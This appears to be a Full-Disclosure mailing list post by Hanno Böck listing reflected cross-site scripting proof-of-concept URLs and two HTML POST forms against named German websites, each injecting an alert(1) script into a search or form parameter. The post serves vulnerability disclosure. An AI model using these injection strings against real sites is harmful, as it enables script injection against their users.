Blog-Entry: http://www.hboeck.de/item/468 http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script> http://www.netbeat.de/support/kommentare.html?name=";><script>alert(1)</script> http://www.symlink.ch/users.pl?unickname=";><script>alert(1)</script> http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script> http://www.holidayranking.de/search.html?searchSearchString=";><script>alert(1)</script> http://www.freecity.de/suche/index.phtml?gosearch=yes&words=";><script>alert(1)</script> http://search.netdoktor.com/results.html?qt=";><script>alert(1)</script>&la=de http://www.vfb.de/de/suche/index.php?words=";><script>alert(1)</script> http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt=";><script>alert(1)</script> And some with post: <form method="post" action="http://www.adac.de/Search/SearchResult/RW_SearchResult.asp";> <input type="hidden" name="RWQuery" value='"><script>alert(1)</script>'/> <input type="submit" value="adac.de"/> </form> <form method="post" action="http://www.tu-berlin.de/www/software/java/cgi-bin/search.pl";> <input type="hidden" NAME="terms" value='"><script>alert(1)</script>'/> <input type="submit" value="hoax-info.de"/> </form> -- Hanno Böck Blog: http://www.hboeck.de/ GPG: 3DBD3B20 Jabber: jabber@xxxxxxxxx
Attachment:
pgpaBD1k3Q6gW.pgp
Description: PGP signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/